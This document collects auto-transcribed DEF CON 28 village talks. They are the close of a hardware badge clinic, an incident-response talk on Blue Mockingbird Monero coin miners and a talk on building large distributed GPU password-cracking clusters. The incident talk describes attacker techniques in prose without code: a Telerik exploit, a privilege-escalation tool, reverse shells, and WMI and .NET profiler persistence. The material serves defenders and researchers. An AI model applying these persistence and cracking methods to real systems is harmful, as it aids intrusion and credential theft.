it on, once turns it off. So that's the on-off button. The buttons to the side, left and right, these change the animation. Some of you already know this because we produce quite a lot of these badges and a lot of people took them home last year. So I will move to the second animation. Here's the third animation, so I can go back to the first. And in all cases, when I switch the animation, I have to rest my finger on there long enough for it to complete the entire animation cycle. If I just do a quick tap, it will not read. Okay? Well, then it did, but you get the idea. Once I'm touching that button at the very end, it won't register. So that's how the animations work. You can switch, you can turn this on and off with the middle, turn it back on, turn it off, turn it on. So that's how these things work. The one that I like the most, it's the very first one. I think it's Starry Night or Sparkle. I can't remember the name, these animations have names. Yeah. I wish Midi Poet was here because he did the firmware design and engineering. Called these things what they look like, like the Starry Night. And we're close to finished with the badge clinic for today, but I hope that some of this information was helpful. Once again, I will turn it over just to show the back in case you're curious. That's how it looks. I could put this under the microscope, but anything larger than this very small part on the end under the microscope, it's, it doesn't, you can't tell, it doesn't help because the microscope is too powerful. So this is what this badge looks like. It has, I think a hundred, between 120 and 140 parts. I've forgotten the actual number. You turn it on and off with a switch on the right here. Be careful with the switch. You don't want to push down while you're, it's good to be careful with it. It has, it has bent off in some situations and you have to bend it back. So I'll just turn it off there. And that's the hardware on off switch. All right. So we're five minutes until the next presentation, which I believe is, let's just check that out unless AJ wants me to stop or I don't know if we have a next presenter. Let's just check this out. Monero village.what. Org.com. I really, I don't know. I'm going to do org. Okay. So this is not TLS protected, but in this, this moment, I'm not so concerned. Now let's see who's doing the next presentation. We have badge clinic is what's happening right now. And so in one half hour, we're going to hear from Ruben. Giving competition to Monero by ditching opt in privacy. All right. So this looks very interesting. This appeals to me quite a lot. It's always nice to know what other cryptocurrencies are doing and how that relates and contrasts with our technology here at the Monero village. And we actively welcome all of the cryptocurrencies in the world, including the one you just made five minutes ago with your Python module, Python library. So this is what we do in Monero village, right? Anything is blockchain related cryptocurrency, things like that. You're welcome to ask questions about it or just come by and explain your project. We have that with Loki mesh as well today. Really interesting stuff. And in the next presentation, which is coming in just one half hour, it will be from a Z coin enthusiast and developer, I believe. So that sounds, that looks really good. So I'm going to say goodbye. And I hope that you liked all of these devices. These badges there, I think are sold out for the, for the do it yourself models because people seem to like those quite a lot, but I do have this stack right here, plus a few others of the preassembled model. So if you're interested in attack red, a defense blue, you can get that, I'll write the URL here as well, just in case you're not sure where to find them. With that, then we will turn off the stream. So the URL is shop dot Monero devices.com. That's where you can still available. Get your badge. Does that sound good need money? Are you watching now? Are you watching Scott? Who's watching besides myself? All right, so that's, that's all for today. This was the badge clinic, the last badge clinic of the year 2020. Well, you know, we could, could be in China for, I'm not sure about that they canceled China, but that was the badge clinic for DC 28. And thanks a lot to the AV folks for helping AJS. You did a great job and, and just as well. Okay, so I will say goodbye. And that's it for me. My name is Michael. I'm MSVB. Have a good one and thanks for listening.
|
With the help of a close range circuit camera, Michael illustrates the circuits of several recent conference hardware devices, including prototype models. Devices in circulation and on display include: DC28 Intervillage Badge DC27 Rising Badge 35C3 Blockchain DC26/BCOS Badge HCPP19 Badge HCPP18 Badge This is not a speech presentation, rather it is an easy office hours with show and tell to invite questions and answers about low power electronic devices. Visit the Badge Clinic on any day of Defcon in the Monero Village channel (Discord:Defcon/mv-general-text).
|
10.5446/51590 (DOI)
|
Hello and welcome to my presentation with the title Hunting for Blue Mockingbird Co-inminers. I am Vajasal Baccio and I would like to spend the next 20 or 25 minutes with talking about incident response and investigation of the recent incidents attributed to the relatively new thread after called Blue Mockingbird. But because we are in a recon village, this talk will not be about incident response only instead, I would like to share with you our experiences, how we used reconnaissance and open-source intelligence approaches to enrich our results from standard forensic malware analysis. As often happens, data-cars have deleted some of their tools after they used them. However, with our recon and OS-in the approach, we were able to find them and reconstruct the original attack performed by data-cars. Moreover, we were able to track origin of the malware and we got inside into the technical capabilities of the Blue Mockingbird Stragator. And finally, in some cases, they could track the in-comings of the cryptocurrency used by Blue Mockingbirds and we can estimate profit of data-cars and compare it with the damage caused to the victims. So this is our agenda and now let me allow to introduce myself. Who am I? I am Modisla Baciu and I currently work as a security senior consultant and malware analyst for LIFERS, New York City based incident response and digital forensic company. In the past, I also worked for government of one European country as analyst in C-SERT, computer security incident response team for IKEA. But now, okay, we can ask one of you's question. Why presentation about malware analysis, threat intelligence and OSN? There are a lot of automated solutions such as anti-virus canneers and sandboxes. So why do we need to bother with additional malware analysis and enrichments with info from another public sources if those automated solutions can identify most of the common threads? Well, that's the reason in the previous sentence. They can identify the most of the common threads and I would like to emphasize the word common. When you need to deal with advanced threat actors or uncommon threads such as rare or obfuscated malware samples, they can stay undetected by many of anti-virus canneers and sandboxes. On the other hand, malware analyst can perform brief analysis of those samples and moreover, if they enrich the gathered results with intelligence info, they can quickly provide the rest of the team with accurate report. And this report can include not only the purpose and capabilities of the malware, but also origin of the samples or attributions to the threat actors. It can also help to reveal yet anti-squared steps of attacker as well as it can recover yet missing pieces of malware puzzle used by attacker. And last but not least, these brief analysis with intelligence data can collect more indicator of compromise, really one relevant for threat intelligence, for threat hunting and monitoring team. And when we are talking about using threat intelligences and other data sources, we can search for many attributes. There are obvious ones like URLs, hashes and so on, but in addition, very helpful can be searched by filename, regular expressions and malware classifications such as categories and tags. Also search for strings embedded in the malware or search by import hashes can discover more similar samples which can be linked to the same attacks or to the same threat actors. And where to search? Here is a list of couple of examples which will be covered later during this talk and also some of these tools can be very handy for the analyst, but these slides will be shared with you, so let's move for that. And okay, now we are ready to start with advertiser incident response and infection with coin miners. So it began with a high load of some computers, one could say, nothing strange, maybe only updates were being applied, but local IT guys verified these machines, they noticed something unusual. Abnormally high CPU and memory usage by SVC host process. Moreover, the SVC host process corresponded with the problem reports and solution control panel support service. This could be more serious problem indeed. Antivirus didn't find anything, but after manual submission of DLLs, the antivirus company identified them as coin miner or crypto mining variant. So that's how the incident response began. We verified the findings of our client and we started analyzing machine with the coin miner. We followed the usual procedures and examined the provided evidence. We also verified signatures of DLLs in the Windows system 32 directory and we checked those files against the National Software Reference Library database. As a result, we found couple of malicious files, for example, this unknown file where we had a CPU support E DLL, which tried to remix the legitimate one file name without E suffix. On the infected systems, there were couple of DLLs masked as wannabe Windows system DLLs files, but their hashes and also their file names were not present in any databases of known software and also in clean Windows systems they were not found. In addition, we saw that the extracted strings contained many occurrences of e-sense of strings, so we had to deal with infection of e-sense based coin miner. There is another thing common for all of these e-sense based coin miner DLLs. They created a new text called sample Xn07 and this new text ensures that only one instance of coin miner is running on each infected device. I need to add that this new text name can be used as an additional indicator of compromise and also it can be used for finding another related samples in public databases. While the most detected fake DLLs had the same hash, there was only one with different hash. It executed the command line with the command for creation of scheduled task called Windows problem collections and as well as other persistence via services. Thus, it was responsible for one part of the persistence mechanism we already found. But the question is what else attack were deployed in the client network and how they got access to the network? First steps of forensic analysis revealed the one batch file called x.bet and couple of suspicious tasks. The batch file contained the PowerShell downloader which downloads additional content from JavaScript resource on the local web server. However, it was not JavaScript but PowerShell which created the scheduled task and these scheduled tasks used the file called screech temp. In our case, it contains a backdoor, a netcap backdoor. And what about its origin? The threat intelligence search based on file names and strings led us to the four years old scheduled task backdoor GitHub repository with Chinese commands in Rhythmify. Forensic analysis also revealed DLLs files dropped by EIS worker process. The DLLs files were mixed-mode assemblies so they contained both the managed and unmanaged code. The dotnet part of DLL contains only the empty class. Yes, it was really empty. On the other hand, in the native code, this DLL made dispatchers spend our reverse shell connected to the attacker. And as I mentioned, there were more similar DLL files. However, these files differ only in two strings which contained the original file name of DLL. So no significant differences in the functionality of these files. With suspicion that this could be payload delivered after the exploitation of ASP.net vulnerability because of IIS worker process, we tried to find something more about it. With the similarity in the original DLL names, it was easy to leverage the thread intelligence and found the particular vulnerability and the tool which produced the same DLLs. It turns out that these files had been part of a remote-code execution exploit for vulnerability in the LARIC web user interface for ASP.net. This exploit can be found on GitHub again. And after a review, it was clear that this tool was used for building the DLLs with the reverse shell we just discovered. So we find the origin of this tool and also the initial vector of compromise. Further investigation and hunting for other persistent methods revealed the WMI event subscriptions. DataCares registered the event filter and consumer and also the filter to consumer binding. And as a result, it executed the same command as we already saw in the DLL files. Now we thought that we were ready to start with remediation and removal the malicious artifacts from the network. We developed custom PowerShell scripts for detection of all malicious stuff we were ever including the malicious files and also the persistent artifacts. Then we deployed our script throughout EDR solution and there was a big surprise. EDR fired an alert that there were detected attempts to install persistence for malicious DLLs we already know. So we investigated those alerts and we found that those commands had been spawned by PowerShell process. Actually, the PowerShell process associated with our removal script. What? What the hell is this? We were absolutely sure that our PowerShell script didn't do anything like this. Its purpose was to remove malicious persistence not to create new one. Yet we tested our script in our lab and also our client tested this script in their environment and nothing similar was observed. Hence there was only one possible explanation of this. The attacker established another persistence method we did not find yet. Therefore, another investigation was needed. After a while we found that the malicious DLL is loaded into the PowerShell process shortly after it queried the registry for specific class ID. And this class ID pointed to one of the malicious DLL files. Okay, but now there is another question. Why PowerShell was interested in this malicious class ID? The answer was then in the environment variables. Especially there were two environment variables called core-enabled profiling and core-profiler. They caused that every managed process was connected to the profiler specified by given class ID. So, the attacker misused the profiling of.NET applications. Great. Another small victory for defenders. Yeah. Now, before we continue, let's quickly summarize what we discovered until now. We already saw thousands of malware samples from our families. Schooling miners, DLL installers for those school miners, schedule tasks, backdoors, and reverse shells delivered after the exploitation. Regarding persistence, we already discovered malicious services and scheduled tasks. And later on we discovered and analyzed WMI event subscription and core-profiler persistence. At this point, we had a lot of samples and persistence. But we were faced with the questions how that could install all of these persistence artifacts and what they exactly did between the initial exploitation and installation of coin miners on thousands of computers. Now we really needed to enrich our results with external data from threat intelligence and OSN. We used a clever tool called Mulin by Florian and Oat. All we needed to do was to create one file with hashes of malware samples and let Mulin to edit its work. We find several hashes in public repositories, but there were only one public submission of the DLL installer without any trace detected. When we did a context search instead of object search, we get another submission, as we can see in the picture. The zip archive with potentially malicious files. Now let's look on the zip.com file. It contains several DLLs, batch files and one MOF file which stands for Managed Object Format. We were familiar with some of them. One DLL was coin miner and the second was installer we already analyzed. The MOF file was interesting. Now you can see its content on the right. It contained definitions of WMI event subscriptions used for persistence we found earlier. So we got it. We found the WMI persistence. Now we are aware how it was created. But what about the batch files? They were new for us, but there was strong assumption that they were also related to the same ethics. When we examined the RnBAT file, we could say Heureka! This batch file was an installation script for all stuff related to coin miners and persistence we already discovered. Thus, this is another piece of puzzle we missed until now. The first batch file called Sn.BAT was Unpecker. It also seemed that the coin miners malicious stuff originally came as a package called set.zip. We also saw that this installation batch script was executed via a program called let.exe. But what was the let.exe and what files did the set.zip contain? We didn't find it yet. So let's continue. We applied the same approach again and we tried to do a reconnaissance about let.exe and installation package. In some cases, we were able to follow tracks of the let.exe execution in public sources. It seemed that it was a kind of local privilege exploit, then suddenly we found the one submission of set.zip on hybrid analysis and this submission could be related to our investigation. And yes, this file was exactly the one we were hunting for, the installation package. And the program let.exe was included. As it turned out that our hypothesis was correct, the program let.exe was the juicy potato local privilege exploit with source calls available on GitHub. Again, again on GitHub. Then left only last sample. We don't analyze until now. The nw.gold.dll from previews zip archive from an Iran. It was mixed-mode.dll file. Its name was composed from noun, timestamp and architecture. And the mash code contains only empty.net class, while the native code contain dropper of unpacker batch file we saw before. But wait, doesn't look this nw.gold.dll file familiar? Of course, we already saw the mixed-mode.dll with empty C-sharp class. It was reverse shell payload delivered by the Telerik WebUI exploitation. So let's compare these two files side by side. We can see that they contain a lot of similarity stuff and we could assume that this.dll had been also created with build scripts from Telerik WebUI exploit, but now it was developed by Tredactor. Okay, we found all missing pieces of puzzle. We also collected all samples needed for attack reconstruction or simulation. And in that moment, we went one step further. We also collected the whole set of needed samples from public sources. Therefore, we could demonstrate this attack using public sources, public sandboxes without revealing any sensitive info from the private samples shared by our client. So let's all of me to play a sort video demonstration. Dadadadadada. Okay, thank you for watching the video and now, before we summarize our findings, let's proceed with the last part of this talk, the attacker's profit. The extracted keep the mining pools parameters and configuration either from captured pickups or from memory dumps. Then we use these parameters for hunting for more and more samples and repeated this process again and again. Finally, we collected several workers' IDs, but only two account IDs. These account IDs were already used in several cases. In the table, there are amounts of mineral, coin, mines, mines by attackers on various pools. As a food note, some workers were still active last week. But back to the case. In the cases we discovered, that attackers have mined approximately 150 mineral coins in total, which is now approximately $13,000. For comparison, average damages per day victim varies between $50,000 and $500,000. And this includes only the direct costs such as incident response and remediation process, investigation and reinstallation of their systems. The indirect costs such as reputation loss and disruption or damages due to downtime aren't included in this estimation. And last but not least, was it to be discovered in our analysis and research? First of all, thanks to online databases and feeds, we are able to find missing pieces and reconstruct the whole attack performed by this red actor. In the meantime, this red actor got a name, Blue Mockingbird, given by Red Canary Company. We observed that they were capable to adapt and customize burial stalls from GitHub and put all the target dogator in their unpacker and installation scripts. It is unusual to see so many persistence methods used in one attack. This probably required a research performed by Blue Mockingbirds. After that, they were able to earn thousands of dollars, but the victim damages are much greater than the attackers' profit. So that's all from my side. Here I have provided some resources related to this talk. And additionally, you can read something about my work or research on our company website or on my personal blog, and you can find me also on Twitter. So thank you very much for attending this talk, and if you have any questions, please feel free to ask me.
|
During March-May 2020 the Blue Mockingbird group infected thousands of computer systems, mainly in the enterprise environments. There are known incidents in which they exploited the CVE-2019-18935 vulnerability in Telerik Web UI for ASP.NET, then they used various backdoors and finally, they deployed XMRig-based CoinMiners for mining Monero cryptocurrency. Interesting about these cases is the persistence which they used for CoinMiners - lot of techniques including scheduled tasks, services, but also WMI Event Subscription and COR Profilers. During forensic analysis and incident response process it was possible to find these persistences and many coinminers artifacts, but malware samples responsible for their installation and persistence creation have been missing. However, when we enriched results of the standard malware analysis with the Threat Intelligence data and OSInt, we were able to find the missed pieces of puzzle and reconstruct the original attack chain including the initial exploitation, local privilege exploit, two backdoors, main payload and multiple persistence techniques. Moreover, this research reveal many about the tools, techniques and procedures (TTP) of Blue Mockingbird Threat Actor. Finally, with more knowledge about the attackers it is possible to collect more samples of coinminers used by them. After next step of reconnaissance we can get insight into profit of their attacks and compare them with the damages caused by these attacks.
|
10.5446/51594 (DOI)
|
This is Jeremy Gausey. I'm coming to you live from Password Village HQ2 in sunny Austin, Texas. Today's high is 104 degrees. So today I'm going to be talking to you about what it's like cracking at TerraHash's scale. I'm not going to make this a bender pitch in any way. I'm going to focus on the technical challenges that we encounter as we support clients who have, you know, hundreds of GPUs in their clusters. You know, when I first kind of started on this, I kind of thought like 100 GPUs was a really big deal. Now we kind of tend to view 100 GPUs as like meh. I mean, it's good, but it's kind of middle of the road. So, you know, there's a lot of distributed solutions for Hashcat out there. But as far as I know, TerraHash is the only one that aims to operate at warehouse scale. And what I mean by that is more so with the most recent version, but with every version that passes, we aim to embrace the concepts of data center as a computer. And while we currently don't have any clients who have an entire warehouse full of password cracking hardware, that's the point where we're trying to go. And we try to enable the software to be at that level, even if our clients are not quite at that level. So, I'm going to go through the history of how I got started in, you know, massive distributed cracking. And I'm going to go through the technical challenges that we faced as we continue to evolve our Hashdack distributed solution. So, I'm going to start the slide deck. All right. So, in the beginning, I kind of got into this because I was messing around with distributed computing, I was doing stuff with MPI, some other most like software, rocks clusters, you know, things along those nature. But all that was all CPU based. And then when GPU cracking came about, you know, we started looking for solutions that would enable us to distribute GPU workloads. So, I found a piece of software at a Hebrew University called virtual CL. And I did a presentation on a 25 GPU proof of concept cluster that me and bit weasel put together at passwords 12 and Oslo. And when I woke up the next morning after giving that presentation, we had gone viral. We were on the front page of slash dot gizmodo boing boing NBC news, the register like we were everywhere. And in hindsight, I really should have used a lot more than 25 GPUs. I mean, we had more GPUs. That's just what we chose to dedicate to this proof of concept. And had I known in advance in any way that the general public would react how they did to this proof of concept, I would have used like three times the number of GPUs. So just, you know, some of the headlines they came out the next morning that I woke up to, which was pretty surreal because I didn't really see this as a big deal. So, virtual CL was cool at the time because it was the first solution that I knew of that enabled us to sort of transparently distribute open CL jobs across the arbitrary cluster. So what virtual seal does is it provides a virtual open seal platform. And the target software in theory doesn't need to be aware it's communicating with a virtual platform. It just sees any, you know, it sees virtual CL as any other, you know, open seal platform just like AMD and video Intel, what have you. So the target software just simply leased against live open CL which is provided by VCL which then communicates to a broker demon. And then that broker demon distributes the agent demons and the agent demons which are installed on the compute nodes actually communicate with the real open seal library be at AMD and video whatever. So in theory all this is transparent to the end application but in practice, it didn't quite work that way. We had to have a special fork of OCL hash called VCL hash cat, which had some workarounds for VCL quirks and such. It was also required in Fina band, because it was really latency sensitive and ended up being a very chatty protocol, and it required essentially real time communication bandwidth wasn't so much of an issue it pretty much consistently pulled, you know, less than one gig of bandwidth but the, it was really sensitive to latency, you know, even just a couple milliseconds was a couple of things was acceptable but you start getting up into like double digits of latency. You had a noticeable impact on hash rate. And of course if in a band hardware is expensive, it's way more expensive than Ethernet. So it's a low close source, and it required frequent updates. So this is back in the time. You know, this is 2012 through 2013, where every GPU driver that was released broke some shit. And then we had to go back in and implement workarounds and fixes wherever the fuck AMD or Nvidia broke in their driver that day. And VCO was no exception. So with VCL hash cat, we had to have our own workarounds for virtual CL. And then the VCL team, or virtual CL team had to turn around and implement any workarounds for any new driver releases every time they were released, which is, you know, a pretty substantial job. And the problem is virtual CL was created by grad school students. This was a grad school project, and they created this their senior year. And when they graduated in spring 2013, that was it. The project died. So when, you know, the next version of FGL or X was released, you know, I think that was version 13.9 in September of 2013. You know, we go to install a virtual CL cluster for a client. This is actually a 64 GPU cluster, which I mean, we're just starting out. So this is actually a pretty big deal for us. Like 64 GPUs was pretty fucking cool at the time. But, you know, we get, oh, it's installed, we get the hardware built, all that shit. And then we go to install virtual CL and FGL or X and virtual CL just shits the bed. So I like panic and email Hebrew University, you know, I'm like, you guys, we need to update virtual CL for catalyst and FGL or X 13.9. And they, like, well, we can't. Everyone who is working on this project has gone. And intellectual property remains with Hebrew University and mosics. So they can just like, you know, have those people work on it outside of that. I offered to take over the project for them. Because it was kind of essential to what we were doing and I didn't want to see the project die. I thought it was really neat. But the professor over there who was in charge of the project was not amenable to that idea. He actually had pretty grave concerns when we first started using virtual CL for password cracking because he envisioned us turning the world into like a giant botnet. And of course, that wasn't really on our agenda, at least not at that time. But, um, yeah, he really didn't like the idea of, you know, his virtual CL shit ending up in our hands. So we were left high and dry without a software solution. And so we desperately needed something. So we conceived the idea of hashtag. Initially, we thought about making your own virtual CL clone since Hebrew University was not going to give us the virtual CL source code and we're like, well, you know, fuck it, we'll start our own virtual CL with, you know, hookers and blackjack. But the more we actually sat down and thought about what that entails, we determined the level of the level of effort for that was just way too high. And the timeframe in which we needed it was way too short. Like we literally had, you know, hardware in house that we're building for clients who now have no software solution because of virtual CL. So we decided to make a distributed wrapper. And that's when we came up with the idea of hashtag. Like I said, we had iterate really quickly on this. So we went from a whiteboard session to production in less than two months. And this was basically me and Tom steel locking ourselves in the office and, you know, ordering like over $100 for the Taco Bell and just banging this out as fast and furious as we could. I had a traditional client server agent architecture. And it was hash cat focused, but it actually had a generic plugin interface. We had plugins for and this is before there was just one hash cat, right. So we had hash cat, OCL hash cat plus OCL hash cat light plugins and then we had John the Ripper plug in. And then we had like just a generic interface to where any cracking tool could be made to work with hashtag as long as it adhered to like a standard format that we had defined. And then it also had the ability to run arbitrary commands when idle. This was less for our clients and actually more for me because we were running hashtag in house as well for our, you know, cracking as a service type stuff. And this is back in a time when GPU mining was still profitable. So when we weren't working on a password cracking job, I wanted this thing to be generating coins in the background. So the arbitrary idle except command was literally just put in place so that people could like mine light coin or name coin or whatever, when they're when their cluster was idle. So, you know, totally different time. But I mean, it actually worked, you know, it did exactly what it's supposed to do and it was good. And the whole goddamn thing was implemented in this fancy new language called Node.js. Again, this is, you know, early 2013. So like, you know, Node.js was the new hotness and you know, everyone was starting to move that direction with microservices and everything. And that's something is not on the slide but we implemented hashtag version one entirely as microservices. And I shit you not there was like 23 individual packages that comprised hashtag and almost all of those were microservices. And we went that direction because that's kind of like, you know, the programming zeitgeist at the time right like everyone was pushing microservices and pushing asynchronous and, you know, no sequel and all that other horseshit right. And in the end, it created more headaches than not if we just had a monolithic fucking program. You know, maintaining like one server binary and one agent binary is way simpler than like, you know, maintaining 23 individual microservices and making sure that they're all seen to communicating properly and, you know, that the versions are correct, you know, across all 23 packages and there's just a lot of unnecessary headache that was introduced with that that, you know, we we attempted to manage. But even then like our clients would still kind of mess it up, you know, they're, you know, like they would upgrade like 10 of 20 packages and then like the other ones would just be stuck at all versions or, you know, one demon would die and another demon would know that it's dead so then it would shit the bed and anyway. So yeah, no JS microservices, no sequel MongoDB all that shit, try to use all the latest and greatest everything because at the at the time that seemed like the best idea. And also hashtag was more than just workload distribution. So a lot of our clients at the time thought that hashtag was just a g y friends in for hash cat. And we're like, no, it's not it's not just a web UI for hash cat, it actually does like, you know, multi user and, you know, workload distribution with like a really complex four dimensional queuing mechanism like you're trying to explain all this to the client and they're just like, you know, eyes glazed over and like, so it's a web UI for hash cat, like fucking yes okay it's a web UI for hash cat. But it actually did a hell of a lot more than that in fact when you installed hashtag on your box, it basically hijacked it and configured it exactly the way that we needed to be configured it would actually provision the entire server from just installing like the initial meta package. So it's a complete stack of packages they get stack hashtag that's where it comes from. So we had a driver installation driver configuration driver updates and again this is back at a time and even nowadays so kind of a challenge but this is back at a time when GPU drivers were painted in the ass to install and then once you got them installed it was painted in the ass to update. So the fact that we kind of handle this automatically was a pretty big value add also handle configuration even though these are headless servers at this is actually during a time where when you had a headless server you had to have fucking dummy plugs connected to each of the GPUs. There's probably very few people watching this who actually remember that. But yeah, if you had a completely headless server each one of those GPUs had to have a special dummy plug attached to it. So that would connect the necessary pins to trick it to think that there's actually a monitor attached. And we actually had to run Xorg because even though these are headless without Xorg we didn't have the ability to manually set fan speeds, or GPU clock rates, or set like power to do that. So, even though this is a headless server we still had to have dummy plugs to think there's a monitor attached still had to run Xorg and still had to configure Xorg properly to enable us to you know control the fans and control the clocks and all the other shit that we needed to do. And then along those lines. Hashtag also did GPU tuning for you and also automatic overclocking. And this was kind of a double edged sword. So when the R9 290X came out, at first it was like entirely unusable, because of the way that AMD aggressively implemented power tune firmware, I think it was 2.0 at the time. But the GPUs would throttle so aggressively that it was like way slower than the 7970, and it was just essentially unusable. So then I wrote OD6 config. So I think power tune is fucking overdrive. I'm sorry. Oh no, no power tune is AMD. Power miser is AMD. All right, whatever. So OD6 config enabled us to properly configure the R9 290X. And but it was still like it was good, but it was still kind of like mediocre, right? But at that time when I measured it, it was only drawing 300 watts, which is important, because our server platforms like the Brutalis can only handle GPUs that drop the 300 watts. You draw more than that, you're going to blow a fuse on the PCI slots on the motherboard. So we had a automatic overclock profile for the R9 290X that we pushed out to our clients that made the GPU draw just about 300 watts. And then a little bit later down the road, about a year, year and a half later, AMD pushed out a new driver update that actually caused the power consumption to go up by a good 50 to 75 watts. And we did not know this. This kind of went undetected by us until we started getting a rash of clients who were seeing dead PCI slots on their motherboards and all of them had R9 290X based solutions. And I finally busted out a kilowatt and figured out what the fuck was going on. But we actually had the ability through, you know, this, all these mechanisms that we had in hashtag at the time to enable, like the automatic overclocking and configuration and all that, to push out a new underclock profile to all of our clients to try to drop the power consumption down to keep it from blowing PCI slots on the motherboards. So it's both good and bad. Like the fact that we're able to automatically overclock GPUs, you know, to help get the most speed of the GPUs is awesome. But then like in that one specific scenario, it was bad because you start blowing PCI slot pieces. But then it was good that we had this functionality because then we could like correct it through software over the air and automatically correct it on all of our client systems at the same time, which saved us a lot of money because we were, you know, spending hundreds of thousands of dollars on new motherboards. So yeah. And then of course, hashtag also had cluster resource monitoring. So there were some drawbacks. Like I said, the entire guy that thing was written in Node.js. And while Node.js is asynchronous, it also runs on a single CPU thread that may have changed at some point was we're talking like 2013 seven years ago. And I haven't even touched Node.js since. But at the time, everything ran in a single CPU thread, which was stupid because like our cluster controllers had like a minimum of like, you know, 12 CPU cores 24 threads and we're sitting here stuck in one. thread on the server demon. So any long running methods would just totally block the entire application. And we had massive scalability issues. I think the very first, like alpha that we released to clients can only support like four nodes. The second one, we were able to get up to like, you know, nine or 10 nodes. Basically anytime a client ordered a cluster larger than the previous largest cluster we had ever built. We ran into some kind of scalability issue identified some bottlenecks and had to work to remove those bottlenecks. Unfortunately, 90% of the time, the bottleneck was the fact that JavaScript was too slow for the task that we were trying to do. So we had to reimplement, you know, those bottleneck methods in a faster language and they just shell out to them. So like key space calculation was re implemented in C now calculating key space for a mask attack is like really lightweight. But you know, we need to talk about massive dictionaries or rule files, trying to count the number of lines in a file with JavaScript is painfully slow. So that's largely why that entire portion was re implemented in C. And we just like shelled out to that binary to eliminate that body now not eliminate but dramatically reduce it. Rejects anything Rejects. We actually implemented we had implemented in Pearl because Pearl is amazing at Rejects JavaScript is not very good at Rejects. The very thing that we're doing with Rejects here was like validating the hash lists right so client uploads a uploads a hash list and you know some of our clients wouldn't even bucket throwing like 200 million hashes at hashtag right and like one job. But then hashtag has to sit there and, you know, receive the massively large hash file and then validate each individual hash, and then, you know stuff them in a database. And then massive bottleneck. So we end up remit re implementing all that in Pearl to try to get that down and then the agent, like the entire fucking agent we have just re implemented the whole thing in Pearl. We just got so fed up with, you know, everything there and the only reason we picked Pearl at the times because that's like the only language we can iterate fast enough and to rewrite the entire damn thing. But yeah, I said we also used MongoDB, because no sequel was like, you know, the rage at the time. And out of all the no sequel databases we tested Mongo was the most performant. But you know, then we had clients do things like throw 200 million hashes at hashtag. And that would cause, you know, some not only just, you know, bottlenecks and, you know, blocking processes but some like really UI weirdness as well. Like, you know, they would go through the process of creating a job uploading the hash list, and they would just sit there with like the little spinner for a while until it timed out. And so they'd go to create the job again because it timed out right and then they'd go back like 10 minutes later and find out that the other job had finally completed and was actually active and running. But because they went through the process four times trying to get at the start now they have like for the same process running on the cluster. So we threw Redis in front of Mongo as an in memory caching layer. And that actually had a significant impact like positive impact. And they enabled us to ingest hashes a lot faster. But still not a very great solution overall. The web UI client was implemented implemented as a single page application in Angular. It was really clunky. It was really heavy. It was really slow. It constantly caused the browser to freeze if you left it up for more than like 30 minutes. And it just had a ton of bugs. And I think probably the most annoying thing is if you're like a hash cap power user and you sit down and try to use the hashtag web UI. It was just cumbersome as fuck. You know, if there's no way to move quickly in that UI and it gets very repetitive and very tedious. So there was a lot of drawbacks to having that Angular web UI. I absolutely hated it. And you know, anyone who was like really experienced with with cracking and hash cat and stuff, they also hated it and begged us not to have that again. And we were just severely limited by what we could do in a browser for non hash formats at the time. We were scraping everything server side. So like you actually upload like a PDF or upload a doc x or, you know, whatever and we would, you know, scrape the file server side to get the necessary bits. You know, like, office to hash cat and PDF to hash cat shit like that. The problem then became like what do we do with things like, you know, true crypt volumes, or really large sevens of volumes or raw files, right? Like, are you really going to upload like 100 gigabyte disk image through the browser and just we can scrape off like two kilobytes? Like, no, that doesn't make any sense. So yeah, the browser was an issue and then we implemented access controls, but there was nothing fine grain. We assumed that because everyone operating the hashtag cluster was on the same team that, you know, they all kind of had equal rights and equal access to the cluster and therefore all users are admins. We didn't have like, you know, different roles or anything. It was just, if you have an account, then you obviously have a right to be there. Therefore, you are an admin. And I think some of our clients end up wrong with that because it's like, yeah, like everyone on this team does do, you know, have equal rights and access and privilege to the cluster. So this is totally fine. Other clients were like, this is absolutely unacceptable. I eventually got to the point where the old version one code was completely unmanageable. And just implementing what should have been like a minor bug fist ended up like requiring major refactoring. It just wasn't because we threw it together in less than two months, you know, so we didn't think of everything in advance, you know, that would come up and it got really, really hard to implement new features and, you know, try to work around some of the, you know, some of the bugs in there. So we decided we need an entire ground up rewrite for hashtag version two. And at some point I got the idea to create a commercial fork of hash cat with native distributed capabilities. And at the time I was so fucking stoked on this idea it seemed like the best idea, like in the world to me at the time. So we set out to do just that. This is right before hash cat went open source. And then we started work on this like, literally the minute that hash cat went open source. So we implemented and go lang and see with postgres database. Now we chose going because of hiking high concurrency with with go routines right. So with no JS everything ran on a single CPU thread. And we wanted the opposite of that for version two, right, we're going to learn the lesson on that. So, you know, we wanted, you know, just lots and lots of go routines to run everything so that we use like, you know, all 24 threads plus on the box. And going actually also allows for pretty rapid development. So we thought it was a pretty good choice. But we still stuck with the traditional client server agent architecture. You know, we have, you know, numerous clients and then one server, and then however many agents, meaning that that server is both a bottleneck and a single point of value. So the first thing we had to do is we had to split hash cat in two. We took everything that had to do with like, actually starting a cracking job and you know, executing an open cl curl on a GPU was placed into the agent and nothing else like the agent was just like bare bones trimmed down hash cat, you know, launch attack on GPU and that was it nothing more. And everything else we placed into the server library. And then for any code that wasn't already in hash cat, such as like the Jason API, and the, you know, proto buffs for agent server communication workload distribution. Multi user access control and this time we actually implemented fine grained multi role access control. All that was implemented and go. And then we just linked against the sea libraries and this effort actually laid the foundation for the hash cat 4.0 refactor with Libhash cat. And then, because of how clunky our old web UI was, we actually ditched it entirely for a cross platform CLI, which made our power users like really happy. But our less experienced users were not very thrilled with that decision. They still wanted, you know, a GUI, which fair enough. So our plan initially was to maintain both hash cat and hashtag trees in parallel. And then, if there was any features that we added to hashtag, or any like new kernels that we wrote, we would just, you know, backport those as we chose to ask that. This didn't really work out very well in practice though. So when we released version two, it was in sync with hash cat 3.5, but it didn't stay that way for very long. And of course we had to add a cross platform GUI to the roadmap as well because we had significant feedback from our clients that they really wanted the goddamn GUI and they were not happy that we took away the web UI. It turns out this was the single dumbest motherfucking thing I've ever done in my life. I completely underestimated how much work was involved in creating a commercial fork of hash cat. Like, genuinely, I, yeah, I really don't know how to convey how fucking stupid of an idea this was. We spent like 100% of our time just backporting things from hash cat into hashtag instead of actually adding new features or running new kernels, like literally months of work, you know, just backporting hash cat commits. And I got really frustrating, you know, it's like, Hey, are we are we working on these tickets? Are we working on these features? No, we're working on backports. You know, I got so sick of hearing working on backports working on backports like, like, when are we ever going to be done with backports? And then when Adam refactored hash cat for 4.0, that also meant that we had to refactor hashtag as well. And we hadn't even finished implementing all the backports at the speed that Adam was, you know, committing things to hash cat. So this was just like, absolutely un-maintainable, right? Like, fuck me. And then there was also this other little minor problem 